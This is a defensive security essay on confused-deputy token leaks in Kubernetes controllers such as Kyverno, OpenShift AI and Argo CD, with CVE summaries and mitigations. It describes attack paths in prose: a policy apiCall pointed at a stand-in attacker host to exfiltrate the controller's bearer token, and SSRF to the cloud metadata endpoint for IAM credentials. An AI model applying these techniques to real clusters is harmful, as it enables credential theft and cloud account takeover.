A developer at a mid-sized SaaS shop pushes a ClusterPolicy change through your GitOps pipeline. The diff is six lines, mostly indentation. It adds an apiCall block that fetches an internal allowlist from http://allowlist.attacker.example.com/v1/list instead of the legitimate internal service. The pull request is approved by a reviewer who is half-paying-attention because the Kyverno policies in this repo change three times a week.

Within seconds of the policy syncing into your cluster, your Kyverno admission controller faithfully makes an outbound HTTPS request to that URL — and on the way out, the controller’s helper code attaches an Authorization: Bearer <kyverno-controller-token> header, because that’s what the helper has done by default since 2024. The attacker now has a Kubernetes ServiceAccount token bound to an identity with get/list on every Secret in the cluster, the right to mutate any Pod, and the ability to push a new MutatingWebhookConfiguration that intercepts every API call on its way through. They are, for all practical purposes, cluster-admin.

This is not a hypothetical. It’s the Kyverno CVE-2026-40868 attack chain, and it’s the fourth distinct CVE shipped against the same apiCall feature in roughly three months. It is also the same architectural pattern that produced CVE-2026-5483 in Red Hat OpenShift AI’s odh-dashboard two weeks ago, and CVE-2025-55190 in Argo CD’s project API last fall. Different products, different teams, same bug class. Kubernetes has a confused-deputy problem, and it is not going to fix itself.

The Pattern Has a Name

The “confused deputy,” first described by Norman Hardy in 1988, is when a program with high privilege is tricked by a low-privilege caller into using its own authority to access something the caller could not access directly. The classic example is a billing daemon running as root that accepts a user-supplied output file path and writes the user’s invoice wherever they tell it — including /etc/passwd.

Kubernetes is a confused-deputy generator by construction. Every controller in the cluster is a privileged process running on behalf of less-privileged users, authenticating with a ServiceAccount whose RBAC is — almost universally — broader than any individual user’s. And it accepts user-supplied input: ClusterPolicies, Application manifests, CRDs, dashboard requests. Whenever the privileged side of that boundary uses its own credentials to act on the user-controlled side, the conditions for confused-deputy escalation are present.

For most of the last decade, the Kubernetes security conversation has been about pod-to-host escapes and RBAC privilege creep. Both have improved. The 2026 problem is different: the privileged identity inside the cluster — the controller’s ServiceAccount, with its broad ClusterRole binding and its long-lived (or insufficiently bound) token — is being leaked outward through helper code that nobody is auditing.

A Six-CVE Quarter Across Four Products

The pattern is concrete enough that you can list the CVEs without straining for examples.

CVE-2026-22039 — Kyverno cross-namespace privilege escalation via Policy apiCall.urlPath. Disclosed February 2026, CVSS up to 10.0. A user with permission to create a namespaced Policy can construct a urlPath that — after Kyverno’s variable substitution — resolves to an arbitrary Kubernetes API path. The controller then performs that API call using its own ServiceAccount token, breaking namespace isolation entirely. A tenant in team-a can read Secrets in team-b, list ClusterRoleBindings, or hit the cloud metadata endpoint at 169.254.169.254.

CVE-2026-4789 — Kyverno SSRF via apiCall from any policy author. A separate code path in Kyverno’s apiCall feature that allows the controller to make arbitrary outbound HTTP requests, including to internal cluster services and cloud metadata endpoints, all using the controller’s bearer token in the Authorization header. Affects 1.16.0 and later; the fix landed in main in early April 2026 but at disclosure had no patched release.

CVE-2026-40868 — Kyverno apiCall service.url implicit bearer-token injection. Disclosed April 14, 2026, CVSS 8.1. The servicecall helper auto-attaches the controller’s bearer token to outbound requests whose URL is policy-controlled. Patched in Kyverno 1.17.0; no backport for 1.15.x or 1.16.x.

GHSA-8wfp-579w-6r25 and GHSA-f9g8-6ppc-pqq4 — companion advisories to the above, covering related token-leak paths in the same apiCall machinery. Treat them as variants of the same root cause.

CVE-2026-5483 — Red Hat OpenShift AI odh-dashboard Service Account token disclosure. Published April 10, 2026, CVSS 8.5. A NodeJS endpoint in the dashboard returns Kubernetes ServiceAccount token data in its response — CWE-201, “Insertion of Sensitive Information Into Sent Data.” If the dashboard Route is exposed (which is the default in most OpenShift deployments), the endpoint is reachable without prior authentication. The dashboard’s ServiceAccount in many deployments has near-cluster-wide reach.

CVE-2025-55190 — Argo CD project-level API token leaking repository credentials in plaintext through /api/v1/projects/{project}/detailed. CVSS 10.0. A project token without explicit secret-read permissions could nonetheless retrieve repo usernames and passwords for every repository attached to the project — a different shape of confused deputy, where the API endpoint elevates the caller’s read scope using the controller’s broader access.

Six CVEs across four widely-deployed control-plane components in roughly seven months. Argo CD is the GitOps deployer of record for a meaningful slice of the Kubernetes operator economy. Kyverno is one of the two dominant policy engines. OpenShift AI is the platform Red Hat is pushing as the enterprise ML stack. None of these are obscure. The bug class has reached the point where you should treat any cluster controller that accepts user input and makes outbound network calls as a candidate for the same audit you would do on a public-facing web application.

Why Controllers Make Such Good Confused Deputies

Three architectural conditions, all common, combine to produce this pattern.

Condition one: a broad ClusterRole bound to a long-lived ServiceAccount. The default Kyverno Helm chart binds the admission controller to a ClusterRole with cluster-wide read on Secrets, mutate access on most workload kinds, the ability to create SubjectAccessReviews and TokenReviews, and the right to generate resources in arbitrary namespaces. The default OpenShift AI dashboard ServiceAccount is broadly scoped because the dashboard manages notebooks, model serving, and pipelines across the platform. Argo CD’s controllers can read every repo credential and deploy to every target. None of these were misconfigurations — they are the product’s default scope of authority, and they have to be that broad for the product to function. The radius of a confused-deputy attack is therefore the product’s authority, not the user’s.

Condition two: a helper that auto-attaches the controller’s identity. Kyverno’s apiCall helper auto-injects Authorization: Bearer <token> because some apiCall destinations are the Kubernetes API itself, and the helper’s authors did not want every policy author to have to copy a token-mount block into their YAML. OpenShift AI’s dashboard returns ServiceAccount token material because some legitimate flow inside the dashboard needed it server-side and a helper exposed more than it should have. Argo CD’s project endpoint includes repo credentials in /detailed because some legitimate flow needed them. In every case, the implicit, helpful behavior is the bug. The principle of “make the safe thing the default” was inverted: the default is to share the controller’s identity, and the safe thing requires explicit caller action to opt out.

Condition three: user-influenceable destinations. Kyverno apiCall URLs come from policy YAML. OpenShift AI dashboard endpoints accept user requests over HTTP. Argo CD project tokens authenticate against a multi-tenant API. Every one of these accepts input from a less-privileged caller and uses it to determine where the controller’s privileged identity goes next. There is no allowlist of trusted destinations on the privileged side, no separation between “act on my behalf with my reduced rights” and “act on the controller’s behalf with the controller’s full rights.” The controller does what the helper tells it to, and the helper does what the user said.

When all three conditions are present, the cluster’s most powerful identity becomes a function of the least-privileged user’s input. That is the working definition of a confused deputy, and it shows up at cluster scope every time.

The Pattern-of-Bugs Failure

Look closely at Kyverno’s apiCall feature and the picture becomes uncomfortable. CVE-2026-22039 is a urlPath bug. CVE-2026-4789 is an SSRF in the same feature. CVE-2026-40868 and the related GHSAs are token-leak variants. Different code paths, different exploits — but all of them root-cause to the same architectural choice: the apiCall feature accepts a destination from a user-controllable source and authenticates the outbound request with the controller’s identity. Every fix to date has been a point patch — disable bearer injection for service URLs, validate the namespace on urlPath, add an allowlist flag — without rethinking the underlying assumption that the controller is the right principal to make these calls.

When a single feature ships four CVEs in three months, the responsible engineering response is not another point fix. It is to ask whether the feature should exist in its current form. Kubewarden’s response to the Kyverno bug class was to publish a public statement that Kubewarden is not affected because it does not support outbound apiCall-style enrichment. That is not luck. That is a deliberate architectural choice to refuse the feature that produces the bug class.

The Cloud Compound Effect

The damage of a leaked controller token does not stop at the cluster boundary. On every major cloud provider, the cluster’s nodes have access to an instance metadata service: 169.254.169.254 on AWS and Azure, metadata.google.internal on GCP. On AWS EKS with IRSA or pod identity, an SSRF that originates from inside a controller pod can hit the IMDS, request the node’s IAM role credentials, and walk straight out of the cluster into the AWS account. On GCP, a similar dance produces a workload identity token. On Azure, the managed identity.

A Kyverno SSRF or token leak in a hosted Kubernetes environment is not a Kubernetes compromise — it’s a cloud compromise with a Kubernetes entry point. The blast radius is whatever the node’s IAM role is allowed to do, which on most operational deployments includes ECR push, S3 read, and at least some IAM operations. An attacker with the right policy edit can pivot to the cloud account in the time it takes for one HTTP request.

This is precisely what AWS confronted in 2019 with Capital One’s IMDSv1 SSRF. The industry’s response was IMDSv2, which requires a session token from a specific hardened code path. Kubernetes has no equivalent. There is no “controller token v2” that requires audience binding before it will authenticate, no protocol-level barrier to the controller token flowing wherever a helper sends it. The cluster’s most powerful identity is a long-lived bearer token in a file, and we move it around the network like it’s 2014.

Detection Is Almost Useless Here

The standard SOC playbook for credential theft assumes you’ll see something. A login from a strange geography. A user authenticating from two places at once. A token used in an unexpected geography or at an unexpected time. None of those signals fire for this attack class.

The token leaves the cluster in a TLS-encrypted GET request that originates from the legitimate controller pod’s IP. To any observability layer that watches network metadata, this is normal Kyverno behavior — Kyverno makes outbound HTTP calls all the time as part of its apiCall feature. The destination is whatever URL the policy specified, which to a service mesh looks like an unrecognized but not necessarily malicious external endpoint. The Kubernetes audit log will show the system:serviceaccount:kyverno:kyverno identity making API calls after the token has been exfiltrated, but those calls will originate from outside the cluster — and most cluster audit log pipelines do not record the source IP of API authentication, or do not alert on it.

The only high-fidelity signal is structural: a ClusterPolicy with an apiCall.service.url that points outside the cluster’s known service network, or a controller-account API call from a source IP that is not the controller pod’s IP. Both require setup most clusters do not have.

This is the same problem the dwell-time-collapse essay flagged for ransomware: the detection model’s assumptions don’t match the attack’s shape. A token-leak confused deputy is silent. The breach is the policy commit, and the policy commit is in your GitOps repository, signed by a legitimate developer’s GPG key. There is nothing to detect after the fact except the consequences.

What To Actually Do

The honest answer is that the structural fix has to come from the controller authors, and most of them have not yet absorbed the lesson. Until they do, the operator-side mitigations are the same in shape across every product and worth doing now.

Audit the ClusterRoleBindings of every controller you run. Pull a list with kubectl get clusterrolebindings -o json | jq '.items[] | {name: .metadata.name, role: .roleRef.name, subjects: .subjects}' and ask the same question of each: if this token leaked tomorrow, what is the worst case? If the answer is “they read every Secret in the cluster,” your priority is reducing what that token is allowed to do, not detection.

Move every controller to projected, bound, audience-scoped tokens. Since Kubernetes 1.22, projected ServiceAccount tokens with the TokenRequest API support audience binding, time-bound expiration, and automatic kubelet-side rotation. The Kyverno apiCall token-leak attack still works against a projected token, but the leaked credential expires in an hour instead of being valid until the controller’s lifecycle ends. That is not a fix, but it is a substantial reduction in the value of a stolen token. Every controller chart that still mounts long-lived tokens from the legacy auto-mount path should be re-templated.

Apply NetworkPolicy egress to every controller namespace. A controller does not need outbound internet access by default. Block 169.254.0.0/16 (cloud metadata, link-local), allow only the Kubernetes API server CIDR plus required in-cluster services, and watch for 24 hours. If something breaks, you’ve discovered a feature you didn’t know your platform was using; if nothing breaks, you have eliminated an entire class of exploit paths. For Kyverno specifically, the controller’s egress should be the API server and nothing else unless you have a documented policy that requires external apiCalls.

Restrict cluster-scoped policy and CRD edit verbs. The Kyverno attack requires clusterpolicies.kyverno.io create/update permission. The Argo CD attack requires project token issuance. The OpenShift AI attack is even worse because no privileged user action is required at all. For the first two, the question is whether your developers should have direct edit rights on cluster-scoped policy resources, or whether those changes should go through a more guarded pipeline with a slower approval. The “everyone can edit ClusterPolicies because GitOps” model is an open door to a CVE-2026-40868-shaped attack.

Refuse the feature where you can. Kubewarden’s response to the apiCall bug class was to never ship the feature in the first place. If you are using Kyverno’s apiCall context exclusively to fetch internal data that could be expressed as a Kubernetes resource — a ConfigMap, a CRD — switch to that. The --enableApiCallContext=false controller flag removes the attack surface entirely. Most teams using apiCall don’t need it for the policies they actually have; they enabled it because the example in the docs used it.

Audit every controller dashboard or web UI for exposed token endpoints. OpenShift AI is not the only controller component with a dashboard that ships server-side endpoints. Run an authenticated and unauthenticated probe of every cluster web UI you operate, with eyes on responses that include JWT-shaped strings, anything that base64-decodes to something that looks like a Kubernetes token, or any field labeled token, bearer, or secret. The attack surface here is not novel — it’s the standard “find sensitive data in API responses” hunt — but most teams have never run it against their own platform components.

The Architectural Conclusion

The Kubernetes ecosystem grew up on the assumption that controllers are trusted infrastructure. They run as the platform, with the platform’s authority, and the contract was that users would supply YAML and controllers would execute it on their behalf. That contract is fine when the YAML is a Pod spec. It breaks down when the YAML is a policy that tells the controller where to send its own credentials.

The controller-token-leak class is what happens when that contract meets feature creep. Every modern controller is accreting “enrichment” capabilities that let policy authors fetch data from external systems, and every one of those enrichments is a candidate for the same bug pattern Kyverno has now shipped four times. OpenShift AI is the same pattern in a different idiom — a dashboard exposes server-side data because someone needed it for a UI feature. Argo CD is the same pattern in a third — a project endpoint returns more than its caller is supposed to see because the helper that built the response is using the controller’s view of the world.

The fix is not another point patch on Kyverno’s servicecall helper. The fix is for controller authors to internalize the same lesson that web framework authors internalized about SQL injection in the late 2000s: a feature that takes user-controlled input and combines it with privileged identity is dangerous by default, and the safe path has to be the only path. Auto-attaching a bearer token because “policies usually want one” is the equivalent of mysql_query("SELECT * FROM users WHERE id = $id"). It will produce CVEs forever until the API itself refuses to do it.

Until that shift happens, your job as an operator is to assume every controller in your cluster is a confused deputy with a CVSS 9 waiting to be discovered, and to architect around that assumption. Reduce the token’s authority. Bind its lifetime. Block its egress. Audit its inputs. Treat your developers’ direct write access to cluster-scoped resources as a privilege boundary, not a productivity feature.

The controllers will eventually catch up. The bug class is now public, and the security teams behind them will spend Q3 hardening the helper functions that produced this quarter’s CVEs. Until that lands across the ecosystem, the easiest privilege escalation in any given Kubernetes cluster is not a kernel exploit, not a container escape, and not a misconfigured RBAC binding. It is one helper function inside one controller, doing exactly what it was written to do.